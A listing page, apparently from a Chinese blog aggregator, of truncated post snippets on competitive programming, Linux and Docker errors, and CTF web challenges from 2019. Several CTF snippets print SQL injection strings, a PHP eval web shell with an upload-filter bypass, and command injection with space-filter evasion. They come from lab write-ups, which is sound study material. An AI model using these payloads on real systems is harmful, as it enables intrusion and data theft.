secret 2019 file
P5659 [CSP-S2019] 树上的数
相信大家都看过题,但还请搞清楚是数对应结点编号。这里用 \(a_i\) 表示 \(i\) 号结点对应的数。 对于 \(n\leq 10\) 的数据,全排列出删边的顺序然后模拟,取字典序最小的方案。 对于菊花,仍然考虑删边的顺序,假设删边依次是 \(rt\to v_1,rt\to v_2,\cdots ......
P5666 [CSP-S2019] 树的重心
考虑一个结点在什么情况下会成为重心。 随便钦定一个根结点。对于结点 \(u\),假设割掉了其子树 \(v\) 中的某条边或连接 \(u\) 和 \(v\) 的边,形成了一棵大小为 \(k\) 的新树。 令 \(mx\) 表示除 \(v\) 子树外最大的子树大小(或 \(n-siz_u\))。如果 \ ......
[Cnoi2019] 青染之心
[Cnoi2019] 青染之心 题目描述: Cirno初始有一个空的物品序列,一个大小为 \(V\) 的背包,现在你有 \(q\) 个操作,分为两种: add x y : 表示加入一种体积为 \(x\), 价值为 \(y\) 的物品到序列末尾 erase : 表示删除序列末尾的物品 对于每个操作结束 ......
Please take a look at the provided example service unit files in this directory, and adapt and install them. Sorry!
安装Redis,执行 install_server.s 脚本时,出现如下报错: 解决方案,注释掉 install_server.sh 中的部分代码,注释代码详情如下: 再次执行 install_server.sh 脚本,结果如下: ......
docker安装msyql5.7报错:mysqld: Can't read dir of '/etc/mysql/conf.d/' (Errcode: 2 - No such file or directory)
安装mysql5.7时使用 #docker拉取镜像命令 docker pull mysql:5.7 #docker安装MySQL命令 docker run -p 3306:3306 --name mysql -v /mydata/mysql/log:/var/log/mysql -v /mydata ......
[极客大挑战 2019]Secret File
打开题目如下。 查看页面源代码,发现存在 Archive_room.php 文件。 访问 Archive_room.php 文件如下。 使用 BurpSuite 抓包,点击 SECRET 后,发现其中某个跳转的页面源代码存在提示 secr3t.php。 HTTP/1.1 302 Found Serv ......
[强网杯 2019]随便注
打开题目,输入:11';show databases;# 后可以发现是堆叠注入。 输入:11';show tables;#。 查看 1919810931114514 表中有什么字段:11';show columns from 1919810931114514;#。 查看 words 表中有什么字段: ......
[SUCTF 2019]EasySQL
题目提示如下。 猜测后台语句是设置为仅在用户输入与 flag 完全一致时才输出 flag。 尝试输入:1;show databases;#,发现存在堆叠注入。 输入:1;show tables;#,获取当前存在的数据表。 尝试输入:1;show columns from Flag;#,经过对比,发现 ......
[极客大挑战 2019]Havefun
访问网站如下。 在网页源代码中有提示。 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> Payload:/?cat=dog。 ......
[极客大挑战 2019]LoveSQL
打开题目如下。 直接使用万能密码即可登录,但未拿到 flag。 这里尝试联合注入,首先确定字段数量,Payload:admin' or 1=1 order by 1;#,当字段数为 4 时报错,因此字段数为 3。 接下来判断什么位置的字段会输出:admin' union select 1,2,3;# ......
[极客大挑战 2019]Http
打开网页如下。 查看页面源代码,发现存在 Secret.php 页面。 <h2>小组简介</h2> <p>·成立时间:2005年3月 ·研究领域:渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术 ·小组的愿望:致力于成为国内实力强劲和拥有广泛影响力的安全研 ......
[极客大挑战 2019]Upload
打开题目后发现是一道上传题,如下。 随便上传个 .jpg 结尾的小马上去,提示:NO! HACKER! your file included '<?'。 <?php @eval($_POST['cmd']); ?> 因此使用其他方式替换掉 <?。 <script language="php">@ev ......
[极客大挑战 2019]BabySQL
打开题目如下。 尝试输入:admin' or 1=1;#,发现 or 被过滤了。 尝试双写绕过:admin' oorr 1=1;#,成功登录。 接下来是与 **[极客大挑战 2019]LoveSQL **类似的,只是多使用了一个双写绕过而已。 ......
[GXYCTF2019]Ping Ping Ping
访问题目后存在提示。 随后输入:/?ip=1;ls 即可看到当前目录下存在 flag.php 文件。 这里尝试使用 Payload:/?ip=1;cat flag.php 得到如下。 这里尝试使用:${IFS}、{IFS}$9、$IFS$9 来绕过空格过滤,发现程序也检测了 {、} 符号,因此使用 ......
linux输入yum后提示: -bash: /usr/bin/yum: No such file or directory的解决方法
https://blog.csdn.net/moveym/article/details/125569233 一、首先了解Linux系统下这两个命令的区别 yum: 属于:RedHat系列 常见系统有:Redhat、Centos、Fedora等 apt-get: 属于:Debian系列 常见系统:D ......
P5404 [CTS2019] 重复 题解
题目链接 观察题目,我们发现直接计算是困难的,先构造单个合法的 \(T\) 分析其性质。 为了构造出 \(T\),先考虑构造时 \(T\) 时什么时候会出现不合法的情况,此时 \(T\) 会有一段和 \(S\) 相同的前缀,且这段前缀后面跟着的字符比 \(S\) 所跟的小。 为了避免这种情况出现,我 ......
linux系统报Too many open files的错误
1、 https://www.cnblogs.com/zj-cloud/articles/17169769.html 一、openfile文件描述符不够 故障现象: 程序会报Too many open files的错误,是因为open files 数目不够 排查思路: 1、ulimit -a 或ul ......
[RoarCTF 2019]Easy Calc
题目一打开,是一个计算器。 主页源代码如下,这里可以看到有一个 calc.php 文件,并且提示存在 WAF(疑)。 <!--I've set up WAF to ensure security.--> <script> $('#calc').submit(function(){ $.ajax({ ......
[极客大挑战 2019]BuyFlag
打开网页,发现右手边的菜单中有个 PAYFLAG,打开后跳转到 pay.php 中,其中网页源代码有提示,主要内容如下: If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the co ......
[极客大挑战 2019]PHP
打开靶机页面后发现有提示:因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯。结合常用的备份字典,直接扫到存在 www.zip 文件,下载后解压打开,发现源码。 在 index.php 中,关键代码如下: <?php include 'class.php'; $select = $_GE ......
File --JAVA
File --JAVA 构造方法 方法说明 public File (String pathname) 根据文件路径创建对象 public File (String parent, String child) 根据父路径名字字符串和子路径名字符串创建文件对象 public File (String ......
[极客大挑战 2019]PHP
打开靶机页面后发现有提示:因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯。结合常用的备份字典,直接扫到存在 www.zip 文件,下载后解压打开,发现源码。 在 index.php 中,关键代码如下: <?php include 'class.php'; $select = $_GE ......
[安洵杯 2019]吹着贝斯扫二维码
[安洵杯 2019]吹着贝斯扫二维码 压缩包里面有个flag.zip文件,但是有密码无法打开 并且注释信息里有一串字符GNATOMJVIQZUKNJXGRCTGNRTGI3EMNZTGNBTKRJWGI2UIMRRGNBDEQZWGI3DKMSFGNCDMRJTII3TMNBQGM4TERRTGEZ ......
Oracle 参数 STANDBY_FILE_MANAGEMENT 官方解释,作用,如何配置最优化建议
本站中文解释 STANDBY_FILE_MANAGEMENT:用于控制应用日志文件的处理,如果设置为AUTO时,此参数将用于控制应用日志文件是被自动删除、备份或迁移,以满足物理备份恢复要求。 设置正确的方法:1. 在Oracle实例中,使用ALTER SYSTEM 命令将STANDBY_FILE_M ......
clickhouse-backup list报错warn BackupList bd.Walk return error: file does not exist logger=SFTP
clickhouse-backup list警告warn BackupList bd.Walk return error: file does not exist logger=SFTP 当clickhouse-backup的默认配置文件/etc/clickhouse-backup/config.y ......
本地起服务报错Logging system failed to initialize using configuration from 'file:config/log4j2.xml'
问题现象: 本地起服务报错Logging system failed to initialize using configuration from 'file:config/log4j2.xml' 解决方法: 1、检查一下依赖 <dependency> <groupId>org.springfram ......
World Tour Finals 2019 D Distinct Boxes
洛谷传送门 AtCoder 传送门 神题。 设第 \(i\) 个箱子有 \(x_i\) 个红球,\(y_i\) 个蓝球,那么要求找到最大的 \(K\) 使得 \(\sum\limits_{i = 1}^K x_i \le R, \sum\limits_{i = 1}^K y_i \le B\),且 ......